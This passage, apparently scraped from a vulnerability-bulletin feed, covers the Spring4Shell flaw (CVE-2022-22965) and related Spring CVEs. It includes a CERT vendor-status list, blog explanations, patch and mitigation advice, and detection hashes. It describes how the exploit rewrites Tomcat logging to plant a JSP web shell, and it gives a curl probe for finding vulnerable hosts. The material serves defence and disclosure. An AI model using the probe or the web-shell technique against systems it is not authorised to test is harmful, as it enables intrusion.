\n---|--- \n \n#### Vendor Statement\n\nCisco is aware of the vulnerability identified by CVE ID CVE-2022-22950 and with the title \"Spring Expression DoS Vulnerability\". We are following our well-established process to investigate all aspects of the issue. If something is found that our customers need to be aware of and respond to, we will communicate via our established disclosure process.\n\n#### References\n\n * <https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-rce-Zx9GUc67>\n\n### Dell __ Affected\n\nUpdated: 2022-04-20 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * [https://www.dell.com/support/home/en-us/drivers/driversdetails?driverid=0vdcg&oscode=naa&productcode=wyse-wms](<https://www.dell.com/support/home/en-us/drivers/driversdetails?driverid=0vdcg&oscode=naa&productcode=wyse-wms>)\n\n### JAMF software __ Affected\n\nNotified: 2022-04-06 Updated: 2022-04-04 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://community.jamf.com/t5/jamf-pro/spring4shell-vulnerability/td-p/262584>\n\n### NetApp __ Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://security.netapp.com/advisory/ntap-20220401-0001/>\n\n### PTC __ Affected\n\nNotified: 2022-04-06 Updated: 2022-04-04 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * [https://www.ptc.com/en/support/article/cs366379?language=en&posno=1&q=CVE-2022-22965&source=search](<https://www.ptc.com/en/support/article/cs366379?language=en&posno=1&q=CVE-2022-22965&source=search>)\n\n### SAP SE __ Affected\n\nUpdated: 2022-04-13 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * [https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>)\n\n### Siemens __ Affected\n\nUpdated: 2022-04-27 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://cert-portal.siemens.com/productcert/pdf/ssa-254054.pdf>\n\n### SolarWinds __ Affected\n\nNotified: 2022-04-02 Updated: 2022-04-06\n\n**Statement Date: April 04, 2022**\n\n**CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received any reports of these issues from SolarWinds customers but are actively investigating. The following SolarWinds product do utilize the Spring Framework, but have not yet been confirmed to be affected by this issue: \u2022 Security Event Manager (SEM) \u2022 Database Performance Analyzer (DPA) \u2022 Web Help Desk (WHD) While we have not seen or received reports of SolarWinds products affected by this issue, for the protection of their environments, SolarWinds strongly recommends all customers disconnect their public-facing (internet-facing) installations of these SolarWinds products (SEM, DPA, and WHD) from the internet.\n\n#### References\n\n * <https://www.solarwinds.com/trust-center/security-advisories/spring4shell>\n\n### Spring __ Affected\n\nNotified: 2022-03-31 Updated: 2022-03-31\n\n**Statement Date: March 31, 2022**\n\n**CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://tanzu.vmware.com/security/cve-2022-22965>\n * <https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>\n\n### VMware __ Affected\n\nNotified: 2022-04-06 Updated: 2022-04-03 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.vmware.com/security/advisories/VMSA-2022-0010.html>\n\n### Aruba Networks __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-08\n\n**Statement Date: April 07, 2022**\n\n**CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nAruba Networks is aware of the issue and we have published a security advisory for our products at https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2022-006.txt\n\n### Check Point __ Not Affected\n\nUpdated: 2022-04-12 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * [https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk178605&src=securityAlerts](<https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk178605&src=securityAlerts>)\n\n### Commvault __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://documentation.commvault.com/v11/essential/146231_security_vulnerability_and_reporting.html#cv2022041-spring-framework>\n\n### Elastic __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://discuss.elastic.co/t/spring4shell-spring-framework-remote-code-execution-vulnerability/301229>\n\n### F5 Networks __ Not Affected\n\nNotified: 2022-04-01 Updated: 2022-04-20\n\n**Statement Date: April 15, 2022**\n\n**CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nF5 products and services and NGINX products are not affected by CVE-2022-22965.\n\n#### References\n\n * <https://support.f5.com/csp/article/K11510688>\n\n### Jenkins __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-02 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.jenkins.io/blog/2022/03/31/spring-rce-CVE-2022-22965/>\n\n### Micro Focus __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://portal.microfocus.com/s/article/KM000005107?language=en_US>\n\n### Okta Inc. __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-04 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://sec.okta.com/articles/2022/04/oktas-response-cve-2022-22965-spring4shell>\n\n### Palo Alto Networks __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://security.paloaltonetworks.com/CVE-2022-22963>\n\n### Pulse Secure __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB45126/?kA13Z000000L3sW>\n\n### Red Hat __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-08\n\n**Statement Date: April 08, 2022**\n\n**CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nNo Red Hat products are affected by CVE-2022-22963.\n\n### salesforce.com __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://kb.tableau.com/articles/Issue/Spring4Shell-CVE-2022-22963-and-CVE-2022-22965>\n\n### SonarSource __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-06 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://community.sonarsource.com/t/sonarqube-sonarcloud-and-spring4shell/60926>\n\n### Trend Micro __ Not Affected\n\nNotified: 2022-04-02 Updated: 2022-04-08\n\n**Statement Date: April 06, 2022**\n\n**CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://success.trendmicro.com/dcx/s/solution/000290730>\n\n### Ubiquiti __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-08\n\n**Statement Date: April 08, 2022**\n\n**CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nThe UniFi Network application only supports Java 8, which is not affected by this CVE. Still, the upcoming Network Version 7.2 update will upgrade to Spring Framework 5.3.18.\n\n#### References\n\n * <https://community.ui.com/releases/Statement-Regarding-Spring-CVE-2022-22965-2022-22950-and-2022-22963-001/19b2dc6f-4c36-436e-bd38-59ea0d6f1cb5>\n\n### Veritas Technologies __ Not Affected\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.veritas.com/content/support/en_US/security/VTS22-006>\n\n### Atlassian __ Unknown\n\nNotified: 2022-04-01 Updated: 2022-04-02 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://community.developer.atlassian.com/t/attention-cve-2022-22965-spring-framework-rce-investigation/57172>\n\n### CyberArk __ Unknown\n\nUpdated: 2022-04-12 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://cyberark-customers.force.com/s/article/Spring-Framework-CVE-2022-22965>\n\n### Fortinet __ Unknown\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://fortiguard.fortinet.com/psirt/FG-IR-22-072>\n\n### GeoServer __ Unknown\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://geoserver.org/announcements/vulnerability/2022/04/01/spring.html>\n\n### Kofax __ Unknown\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://community.kofax.com/s/question/0D53m00006FG8NVCA1/communications-manager-release-announcements?language=en_US>\n * <https://community.kofax.com/s/question/0D53m00006w0My3CAE/controlsuite-release-announcements?language=en_US>\n * <https://community.kofax.com/s/question/0D53m00006FG8RtCAL/readsoft-release-announcements?language=en_US>\n * <https://community.kofax.com/s/question/0D53m00006FG8ThCAL/robotic-process-automation-release-announcements?language=en_US>\n * <https://community.kofax.com/s/question/0D53m00006FG8QdCAL/markview-release-announcements>\n * <https://knowledge.kofax.com/General_Support/General_Troubleshooting/Kofax_products_and_Spring4Shell_vulnerability_information>\n\n### McAfee __ Unknown\n\nNotified: 2022-04-06 Updated: 2022-04-11 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * [https://kc.mcafee.com/corporate/index?page=content&id=KB95447](<https://kc.mcafee.com/corporate/index?page=content&id=KB95447>)\n\n### ServiceNow __ Unknown\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * [https://community.servicenow.com/community?id=community_question&sys_id=5530394edb2e8950e2adc2230596194f](<https://community.servicenow.com/community?id=community_question&sys_id=5530394edb2e8950e2adc2230596194f>)\n\n### TIBCO __ Unknown\n\nNotified: 2022-04-06 Updated: 2022-05-19\n\n**Statement Date: May 17, 2022**\n\n**CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.tibco.com/support/notices/spring-framework-vulnerability-update>\n\n### Alphatron Medical Unknown\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Extreme Networks Unknown\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### PagerDuty Unknown\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\nView all 39 vendors __View less vendors __\n\n \n\n\n### References\n\n * <https://tanzu.vmware.com/security/cve-2022-22965>\n * <https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>\n * <https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html>\n * <https://github.com/NCSC-NL/spring4shell/blob/main/software/README.md>\n\n### Other Information\n\n**CVE IDs:** | [CVE-2022-22965 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2022-22965>) \n---|--- \n**Date Public:** | 2022-03-30 \n**Date First Published:** | 2022-03-31 \n**Date Last Updated: ** | 2022-05-19 16:09 UTC \n**Document Revision: ** | 22 \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T00:00:00", "type": "cert", "title": "Spring Framework insecurely handles PropertyDescriptor objects with data binding", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-05-19T16:09:00", "id": "VU:970766", "href": "https://www.kb.cert.org/vuls/id/970766", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "avleonov": [{"lastseen": "2022-04-06T15:11:45", "description": "Hello everyone! This episode will be about last week's high-profile vulnerabilities in Spring. Let's figure out what happened.\n\nAlternative video link (for Russia): <https://vk.com/video-149273431_456239078>\n\nOf course, it's amazing how fragmented the software development world has become. Now there are so many technologies, programming languages, libraries and frameworks! It becomes very difficult to keep them all in sight. Especially if it's not the stack you use every day. Entropy keeps growing every year. Programmers are relying more and more on off-the-shelf libraries and frameworks, even where it may not be fully justified. And vulnerabilities in these off-the-shelf components lead to huge problems. So it was in the case of a very critical Log4Shell vulnerability, so it may be in the case of Spring vulnerabilities.\n\n[Spring](<https://spring.io/>) is a set of products that are used for Java development. They are developed and maintained by VMware. The main one is Spring Framework. But there are a lot of them, [at least 21 on the website](<https://spring.io/projects/spring-framework>). And because Spring belongs to VMware, you can find a description of the vulnerabilities on the [VMware Tanzu website](<https://tanzu.vmware.com/security>). VMware Tanzu is a suite of products that helps users run and manage multiple Kubernetes (K8S) clusters across public and private \u201cclouds\u201d. Spring is apparently also part of this suite and therefore Spring vulnerabilities are published there. Let's look at the 3 most serious vulnerabilities published in the last month.\n\n## **[CVE-2022-22965](<https://tanzu.vmware.com/security/CVE-2022-22965>): "Spring4Shell", Spring Framework remote code execution (RCE) via Data Binding on JDK 9+**\n\nSpring Core Framework is widely used in Java applications. It allows software developers to develop Java applications with enterprise-level components effortlessly. \n\nSpring4Shell vulnerability allows remote attackers to plant a web shell when running Spring Framework apps on top of JRE 9. It is caused by unsafe deserialization of given arguments that a simple HTTP POST request can trigger and allow full remote access. In fact it is a patch bypass of the old CVE-2010-1622 vulnerability that was introduced 12 years ago.\n\nThe exploitation of this vulnerability relies on an endpoint with DataBinder enabled, which decodes data from the request body automatically. \n\nThe specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, that is the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.\n\nThese are the prerequisites for the exploit:\n\n * JDK 9 or higher\n * Apache Tomcat as the Servlet container\n * Packaged as WAR\n * spring-webmvc or spring-webflux dependency\n * Spring Framework 5.3.0 to 5.3.17, 5.2.0 to 5.2.19. Older, unsupported versions are also affected\n\nThere are [signs of exploitation in the wild](<https://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/>) for this vulnerability. There are more than 30 repositories with [PoC and examples of vulnerable applications on github](<https://github.com/search?q=CVE-2022-22965>). \n\nIn short, look for Spring Framework applications on your Tomcats and then update them to version 5.3.18 and 5.2.20. \n\nQualys [recommendations for Linux](<https://blog.qualys.com/vulnerabilities-threat-research/2022/03/31/spring-framework-zero-day-remote-code-execution-spring4shell-vulnerability>):\n\n * Find java 9+ with `locate`\n * Find "`spring-webmvc-*.jar`", "`spring-webflux*.jar`" or "`spring-boot*.jar`" in `ls -l /proc/*/fd`\n\nAs an option, you can try to update the Tomcats first. it is easier. While CVE-2022-22965 resides in the Spring Framework, the Apache Tomcat team [released new versions of Tomcat](<https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative>) to \u201dclose the attack vector on Tomcat\u2019s side.\u201d \n\nThe remaining two vulnerabilities are in rarer components that are not part of the Spring Core Framework.\n\n## [CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>): Remote code execution in Spring Cloud Function by malicious Spring Expression\n\nSpring Cloud Function is a serverless framework for implementing business logic via functions.\n\nIn Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources. Users of affected versions should upgrade to 3.1.7, 3.2.3. No other steps are necessary. \n\nThere are also [PoCs for this vulnerability](<https://github.com/me2nuk/CVE-2022-22963>). \n\nAnd finally, I would like to finish with a vulnerability that came out a month ago. And went quite unnoticed.\n\n## [CVE-2022-22947](<https://tanzu.vmware.com/security/cve-2022-22947>): Spring Cloud Gateway Code Injection Vulnerability\n\nSpring Cloud Gateway aims to provide a simple, yet effective way to route to APIs and provide cross cutting concerns to them such as: security, monitoring/metrics, and resiliency.\n\nApplications using Spring Cloud Gateway are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.\n\nUsers of affected versions should apply the following remediation. 3.1.x users should upgrade to 3.1.1+. 3.0.x users should upgrade to 3.0.7+. If the Gateway actuator endpoint is not needed it should be disabled via management.endpoint.gateway.enabled: false.\n\nThere are also PoCs for this vulnerability not only in Github, but [also in public packs](<https://vulners.com/exploitdb/EDB-ID:50799>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-03T00:15:45", "type": "avleonov", "title": "Spring4Shell, Spring Cloud Function RCE and Spring Cloud Gateway Code Injection", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2022-22947", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-03T00:15:45", "id": "AVLEONOV:D75470B5417CEFEE479C9D8FAE754F1C", "href": "https://avleonov.com/2022/04/03/spring4shell-spring-cloud-function-rce-and-spring-cloud-gateway-code-injection/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securelist": [{"lastseen": "2022-04-04T17:28:33", "description": "\n\nLast week researchers found the critical vulnerability CVE-2022-22965 in Spring \u2013 the open source Java framework. Using the vulnerability, an attacker can execute arbitrary code on a remote web server, which makes CVE-2022-22965 a critical threat, given the Spring framework's popularity. By analogy with the [infamous Log4Shell threat](<https://securelist.com/cve-2021-44228-vulnerability-in-apache-log4j-library/105210/>), the vulnerability was named Spring4Shell.\n\n## CVE-2022-22965 and CVE-2022-22963: technical details\n\nCVE-2022-22965 (Spring4Shell, SpringShell) is a vulnerability in the Spring Framework that uses data binding functionality to bind data stored within an HTTP request to certain objects used by an application. The bug exists in the _getCachedIntrospectionResults_ method, which can be used to gain unauthorized access to such objects by passing their class names via an HTTP request. It creates the risks of data leakage and remote code execution when special object classes are used. This vulnerability is similar to the long-closed CVE-2010-1622, where class name checks were added as a fix so that the name did not match _classLoader_ or _protectionDomain_. However, in a newer version of JDK an alternative method exists for such exploitation, for example, through Java 9 Platform Module System functionality. \nSo an attacker can overwrite the Tomcat logging configuration and then upload a JSP web shell to execute arbitrary commands on a server running a vulnerable version of the framework.\n\nA vulnerable configuration consists of:\n\n * JDK version 9+\n * Apache Tomcat for serving the application\n * Spring Framework versions 5.3.0 to 5.3.17 and 5.2.0 to 5.2.19 and below\n * application built as a WAR file\n\nCVE-2022-22963 is a vulnerability in the routing functionality of Spring Cloud Function that allows code injection through Spring Expression Language (SpEL) by adding a special _spring.cloud.function.routing-expression_ header to an HTTP request. SpEL is a special expression language created for Spring Framework that supports queries and object graph management at runtime. This vulnerability can also be used for remote code execution.\n\nA vulnerable configuration consists of:\n\n * Spring Cloud Function 3.1.6, 3.2.2 and older versions\n\n## Mitigations for Spring vulnerabilities exploitation\n\nCVE-2022-22965 is fixed in 2.6.6; see [the Spring blog for details](<https://spring.io/blog/2022/03/31/spring-boot-2-6-6-available-now>). \n\nTo fix CVE-2022-22963, you also need to install the new Spring Cloud Function versions; see the [VMware website for details](<https://tanzu.vmware.com/security/cve-2022-22963>). \n\nTo detect exploitation attempts, ensure that Advanced Exploit Prevention and Network Attack Blocker features are enabled. Some techniques used during exploitation can be seen in other exploits that we detect, which is why the verdict names can differ.\n\n## Indicators of Compromise\n\n**Verdicts** \nPDM:Exploit.Win32.Generic \nUMIDS:Intrusion.Generic.Agent.gen \nIntrusion.Generic.CVE-*.*\n\n**MD5 hashes of the exploits** \n7e46801dd171bb5bf1771df1239d760c - shell.jsp (CVE-2022-22965) \n3de4e174c2c8612aebb3adef10027679 - exploit.py (CVE-2022-22965)\n\n**Detection of the exploitation process with Kaspersky EDR Expert** \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/04/04152646/kata_spring4shell.png>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-04T15:30:36", "type": "securelist", "title": "Spring4Shell (CVE-2022-22965): details and mitigations", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2021-44228", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-04T15:30:36", "id": "SECURELIST:E21F9D6D3E5AFD65C99FC385D4B5F1DC", "href": "https://securelist.com/spring4shell-cve-2022-22965/106239/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mmpc": [{"lastseen": "2022-04-11T23:40:15", "description": "**_April 11, 2022 update_** \u2013 __Azure Web Application Firewall (WAF) customers with Regional WAF with Azure Application Gateway now has enhanced protection for critical Spring vulnerabilities - [CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>), [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>), and [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>)._ _See [](<https://www.microsoft.com/security/blog/wp-admin/post.php?post=110715&action=edit#detectandprotect>)Detect and protect with Azure Web Application Firewall (Azure WAF) section for details__.\n\nOn March 31, 2022, vulnerabilities in the Spring Framework for Java were [publicly disclosed](<https://www.springcloud.io/post/2022-03/spring-framework-rce-early-announcement/#gsc.tab=0>). Microsoft is currently assessing the impact associated with these vulnerabilities. This blog is for customers looking for protection against exploitation and ways to detect vulnerable installations on their network of the critical remote code execution (RCE) vulnerability [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>) (also known as SpringShell or Spring4Shell).\n\nThe Spring Framework is the most widely used lightweight open-source framework for Java. In Java Development Kit (JDK) version 9.0 or later, a remote attacker can obtain an _AccessLogValve _object through the framework\u2019s parameter binding feature and use malicious field values to trigger the pipeline mechanism and write to a file in an arbitrary path, if certain conditions are met. \n\nThe vulnerability in Spring Core\u2014referred to in the security community as SpringShell or Spring4Shell\u2014can be exploited when an attacker sends a specially crafted query to a web server running the Spring Core framework. Other vulnerabilities disclosed in the same component are less critical and not tracked as part of this blog.\n\nImpacted systems have the following traits:\n\n * Running JDK 9.0 or later\n * Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and earlier versions\n * Apache Tomcat as the Servlet container:\n * Packaged as a traditional Java web archive (WAR) and deployed in a standalone Tomcat instance; typical Spring Boot deployments using an embedded Servlet container or reactive web server are not impacted\n * Tomcat has _spring-webmvc_ or _spring-webflux_ dependencies\n\nAny system using JDK 9.0 or later and using the Spring Framework or derivative frameworks should be considered vulnerable. The following nonmalicious command can be used to determine vulnerable systems:\n \n \n $ curl host:port/path?class.module.classLoader.URLs%5B0%5D=0\n\nA host that returns an HTTP 400 response should be considered vulnerable to the attack detailed in the proof of concept (POC) below. Note that while this test is a good indicator of a system\u2019s susceptibility to an attack, any system within the scope of impacted systems listed above should still be considered vulnerable.\n\nThe [](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>)[threat and vulnerability management](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-tvm>) console within [Microsoft 365 Defender](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>) provides detection and reporting for this vulnerability.\n\nThis blog covers the following topics:\n\n 1. Observed activity\n 2. Attack breakdown\n 3. The vulnerability and exploit in depth\n * Background\n * Request mapping and request parameter binding\n * The process of property binding\n * The vulnerability and its exploitation\n * Prelude: CVE-2010-1622\n * The current exploit: CVE-2022-22965\n * From ClassLoader to AccessLogValve\n 4. Discovery and mitigations\n * How to find vulnerable devices\n * Enhanced protection with Azure Firewall Premium\n * Detect and protect with Azure Web Application Firewall (Azure WAF)\n * Global WAF with Azure Front Door\n * Regional WAF with Azure Application Gateway\n * Patch information and workarounds\n 5. Detections\n * Microsoft 365 Defender\n * Endpoint detection and response (EDR)\n * Antivirus\n * Hunting\n * Microsoft 365 Defender advanced hunting queries \n * Microsoft Sentinel\n\n## Observed activity\n\nMicrosoft regularly monitors attacks against our cloud infrastructure and services to defend them better. Since the Spring Core vulnerability was announced, we have been tracking a low volume of exploit attempts across our cloud services for Spring Cloud and Spring Core vulnerabilities. For CVE-2022-22965, the attempts closely align with the basic web shell POC described in this post.\n\nMicrosoft\u2019s continued monitoring of the threat landscape has not indicated a significant increase in quantity of attacks or new campaigns at this time.\n\n## Attack breakdown\n\nCVE-2022-22965 affects functions that use request mapping annotation and Plain Old Java Object (POJO) parameters within the Spring Framework. The POC code creates a controller that, when loaded into Tomcat, handles HTTP requests. \n\nThe only publicly available working POC is specific to Tomcat server's logging properties via the _ClassLoader_ module in the _propertyDescriptor_ cache. The attacker can update the _AccessLogValve_ class using the module to create a web shell in the Tomcat root directory called _shell.jsp_. The attacker can then change the default access logs to a file of their choosing.\n\nFigure 1. Screenshot from the original POC code post\n\nThe changes to _AccessValveLog_ can be achieved by an attacker who can use HTTP requests to create a _.jsp_ file in the service\u2019s root directory. In the example below, each GET parameter is set as a Java object property. Each GET request then executes a Java code resembling the example below, wherein the final segment \u201csetPattern\u201d would be unique for each call (such as setPattern, setSuffix, setDirectory, and others): \n\n Figure 2. Screenshot from the original POC code 